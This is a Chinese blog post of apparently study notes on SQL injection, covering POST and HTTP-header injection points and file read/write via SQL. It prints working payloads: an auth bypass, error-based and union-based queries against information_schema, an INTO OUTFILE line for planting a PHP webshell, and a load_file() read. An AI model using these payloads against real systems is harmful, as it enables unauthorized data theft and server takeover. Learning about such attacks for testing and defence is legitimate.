sql注入第三天

最新推荐文章于 2024-04-18 01:00:32 发布
最新推荐文章于 2024-04-18 01:00:32 发布
阅读量71 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47599604/article/details/114652058
版权

目录

POST 注入

POST注入的常见功能点:

POST注入时,一般两种方法:

利用报错注入

union 注入:

注册功能点注入:

SQL 注入读写文件

into outfile:

load_ file():

  • POST 注入

POST功能点也可能会存在SQL注入,

和数据库进行交互的功能点可能会存在SQL注入

  • POST注入的常见功能点:

  1. 注册功能点
  2. 登录功能点
  3. 留言板
  4. 资料修改
  5. 资料删除
  6. ..........

  • POST注入时,一般两种方法:

  1. 使用hackbar 类似插件功能注入
  1. 使用Burp Suite 的Repeater 重放模块

实战演示:

pay load: 'or 1 #

  • 利用报错注入

payload:'and extractvalue('x',concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))#

  • union 注入:

payload:'union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)#

  • 注册功能点注入:

payload:'or extractvalue('x',concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) or'

Referer 注入:

在真实环境中有的注入点不仅仅只是在请求体中,也可能是存在于其他字段上,也就是HTTP的头部注入。

HTTP头注入: 注入点在HTTP请求头部的某个字段中,通常包含以下几种:

COOKIE 型注入: HTTP请求的时候会带上客户端的cookie,注入点存在cookie当中的某个字段中

XFF (X-Forward-For) 注入: HTTP请求中的X-Forworded-For字段,通过修改XFF-Forwarded-For 头对带入系统的dns进行SQL注入,通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库或文件中,可以通过修改XFF头伪造真实IP

Clien-IP:作用同XFF。

User-Agent注入:有的网站会将客户端使用的操作系统或浏览器版本存入数据库中。

Referer注入:有的网站会将客户端referer存入数据库中。

payload:'or extractvalue('x',concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) or'

其他注入(DELETE)

payload:'or extractvalue('x',concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))

这里需要注意,因为是在请求头中,所以需要将空格编码成 + 号。

  • SQL 注入读写文件

在实际应用中,有时候可能由于一些需求, 我们需要读取或者写入文件到目标服务器中,当然读写文件时需要有一定的权限才可以进行读取,常用的函数主要有以下两个:

  • into outfile:

写shell:

当权限为root且知道绝对路径时,可以直接写一句话木马到服务器,注意存在。

'union select 1,"",3 into outfile "c:\\phpstudy\\PHPTutorial\\WWW\\xx.php",

也可以查询null值。

还可以使用load_ file函数读取文件,

  • load_ file():

文件读取,利用load_file()函数进行文件读取,结合@@basedir、@@datedir等函数爆路径

union select 1,2,hex(load_file('c:\\phpstudy\\PHPTutorial\\WWW\\xx.php'))--+

前提条件:

  1. 必须有权限读取且文件是可读的,低权限无法读取高权限用户文件
  2. 被文件必须在服务器上
  3. 必须知道文件的绝对路径
  4. 读取的文件必须小于设定:max_allowed_packet
xiao9105
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入网站源码
04-09
7. **代码审计**:定期进行代码审查,查找可能的SQL注入漏洞,尤其是在使用第三方库或组件时。 8. **Web应用防火墙(WAF)**:可以配置WAF来检测并阻止SQL注入攻击,但不应完全依赖它,因为攻击者可能找到绕过WAF的...
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入第一关
computet_的博客
01-29 1281
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,目前是黑客对数据库进行攻击的最常用手段之一。
sql注入
小郑的博客
04-18 1556
mysql5.1版本以上有一个默认的数据库information_schema,这个数据库下的tables表存着所有表的元数据信息,其中table_schema,是表对应的库名,还有个columns表,这个表中存着所有字段的元数据信息。前端页面上所有提交数据的地方,如登录,注册,留言板,评论区,搜索,分页等等,只要是提交数据给后台,后台拿着数据和数据库交互了,都肯能存在诸如点。加密注入,先通过bp抓包解密数据,然后注入payload,再进行整体的编码加密,然后发送请求,服务端会自动解密。
SQL注入攻击与防护
weixin_62707591的博客
06-21 5720
攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,并且插入的恶意SQL命令会导致原有SQL语句作用发生改变,从而得到欺骗服务器执行恶意SQL命令的一种攻击方式。① 概述开源的自动化SQL注入工具,由Python写成② 主要功能扫描、发现、利用给定URL的SQL注入漏洞③ 特点。
泛微OA8前台sql注入1
08-08
【泛微OA8前台SQL注入漏洞详解】 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造特定的输入来控制或篡改后台数据库的查询操作。在这个案例中,我们关注的是针对泛微OA8系统的一个前台SQL注入...
SQL注入思路详解
12-14
首先,SQL注入的三个关键步骤如下: 1. **识别潜在注入点**:这是SQL注入的第一步,主要关注Web应用与数据库交互的所有可能输入点。这些点包括GET和POST请求参数、Cookie值、HTTP头如X-Forwarded-For、User-Agent和...
SQL注入攻击与防御 第2版
03-10
SQL注入攻击与防御》第二版是一本深入探讨SQL注入问题的专业书籍,旨在帮助读者理解和防范这一常见的网络安全威胁。SQL注入是一种恶意攻击手段,通过在Web应用中输入构造的SQL语句来获取、修改、删除数据库中的...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
Android与Vue.js的跨平台开发指南
07-12
Android 和 Vue 是两个在技术栈和平台上都不同的概念,但它们可以间接地联系在一起: 1. **Android**: - Android 是一个基于Linux的开源操作系统,主要被用于移动设备如智能手机和平板电脑,以及可穿戴设备、电视等。 - Android 应用开发通常使用Java或Kotlin作为编程语言,并且使用Android SDK进行开发。 2. **Vue**: - Vue.js(通常简称为Vue)是一个开源的JavaScript框架,用于构建用户界面和单页应用程序(SPAs)。 - Vue 使用HTML、CSS和JavaScript(Vue特定的语法糖)来构建前端界面。 尽管Vue主要用于Web前端开发,但存在一些方法可以将Vue.js与Android集成: - **WebView**: - Android应用可以使用WebView组件来加载和显示基于Vue.js开发的Web应用,就像在应用中嵌入一个浏览器窗口。 - **跨平台框架**: - 使用跨平台移动应用开发框架,如NativeScript、Weex或React N
基于SpringBoot家政服务管理系统.docx
07-12
随着家政服务行业的不断发展,家政服务在现实生活中的使用和普及,家政服务行业成为近年内出现的一个新行业,并且能够成为大众广为认可和接受的行为和选择。设计家政服务管理平台的目的就是借助计算机让复杂的销售操作变简单,变高效。 家政服务管理平台采用了B/S结构,JAVA作为开发语言,数据库采用了B/S结构,MySQLl数据库进行开发。该系统包括前台操作和后台管理两个部分,一方面,为用户提供首页、服务信息、公告信息、留言反馈、个人中心、后台管理等功能;另一方面,为管理员提供首页、个人中心、用户管理、服务人员管理、服务信息管理、服务类型管理、服务预约管理、服务取消管理、服务分配管理、服务进度管理、评价信息管理、留言反馈、系统管理等功能。 此文档欢迎大家下载学习!
大连外国语大学考研,75个专业课历年考试真题及答案汇总,备考资料题库笔记,考前题库汇总
07-12
大连外国语大学考研,75个专业课历年考试真题及答案汇总,备考资料题库笔记,考前题库汇总
ROS开发开发教程.docx
最新发布
07-12
ROS的特点 模块化:ROS 将复杂的机器人系统分解成多个模块,每个模块可以独立开发和调试。 通信机制:ROS 提供了发布/订阅、服务/客户端等多种通信机制,使得模块间通信更加便捷。 硬件抽象:ROS 提供了对多种传感器和执行器的支持,开发者无需关注具体的硬件细节。 丰富的生态系统:ROS 拥有大量的开源包和工具,开发者可以直接使用这些资源,节省开发时间。
IT标准项目管理流程ppt课件双份文档.ppt
07-12
IT标准项目管理流程ppt课件双份文档.ppt
【目标管理】OGSM目标管理法运用指南.pptx
07-12
【目标管理】OGSM目标管理法运用指南.pptx
2024年欧洲冷锻机市场主要企业市场占有率及排名.docx
07-12
2024年欧洲冷锻机市场主要企业市场占有率及排名.docx
动态201X欧美杂志风季度总结PPT模板
07-12
【作品名称】:动态201X欧美杂志风季度总结PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
html+js+css开发个人简历网页.docx
07-12
制作一个个人简历网页是一个很好的项目,可以展示你的技能和经验。下面是一个简易的个人简历网页示例,包括HTML、CSS和一些JavaScript。
第三方框架预防sql注入
09-23
第三方框架可以采取以下措施来预防SQL注入: 1. 使用ORM(对象关系映射)框架:ORM框架可以自动将对象与数据库表进行映射,从而避免了手动编写SQL语句的过程,减少了SQL注入的风险。 2. 使用预编译语句:许多第三...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值